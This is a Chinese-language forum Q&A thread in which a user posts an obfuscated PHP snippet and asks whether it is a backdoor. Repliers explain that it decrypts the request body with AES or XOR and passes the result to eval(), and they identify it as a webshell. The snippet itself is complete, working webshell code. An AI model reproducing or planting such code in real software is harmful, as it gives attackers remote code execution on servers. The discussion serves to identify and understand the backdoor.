• 中文
    • 繁体
  • 我要提问 我要提问 关注:78 内容:708

    谁给看看这吊毛代码是不是后门

  • 查看作者
  • 打赏作者
  • 当前位置: 35博客圈 > 我要提问 > 正文
    • 6
    • 我要提问
    • <?php @error_reporting(0);$i='f'.'f'.'2'.'9'.'2'.'6'.'b'.'a'.'0'.'c'.'a'.'5'.'4'.'e'.'c'.'a';$_SESSION['k']=$i;session_write_close();$j=file_get_contents(“php://input”);if(!extension_loaded('openssl')){$k=”base64_”.”decode”;$j=$k($j.””);for($l=0;$l<strlen($j);$l++){$j[$l]=$j[$l]^$i[$l+1&15];}}else{$j=openssl_decrypt($j,”AES128″,$i);}$m=explode('|',$j);$n=$m[0];$o=$m[1];class C{public function __invoke($p){eval($p.””);}}@call_user_func(new C(),$o);

      LV10
      vip1

      代码被混淆并以base64编码

      看起来像后门。它接受来自php://input并用AES128对其进行解密。

      然后,它使用分隔符“|”拆分解密的字符串。

      第一部分存储在$n中,第二部分存储在$0中。

      然后使用eval()执行第二部分。

      代码试图通过使用类隐藏自己,然后使用call_user_func()调用该类。

      该代码是一个后门,用于在服务器上执行任意代码。

      回复
      LV6
      vip6
      水晶之恋

      Webshell

      回复
      LV12
      vip3
      admin

      是的

      Hello World

      回复

      小马



      回复
      LV4
      水晶之恋
      原来木马是这样的 [s-11]
      回复
      LV3
      第一次在大神的指引下直面木马
      回复

      请登录之后再进行评论

      登录
      有不懂的问题可以在这里提问!
      提问数 708
      已解决 372
      待解决 333
      发起悬赏提问
    • 任务
    • 管理
    • 皮肤
    • 回底部
    • 帖子间隔 侧栏位置: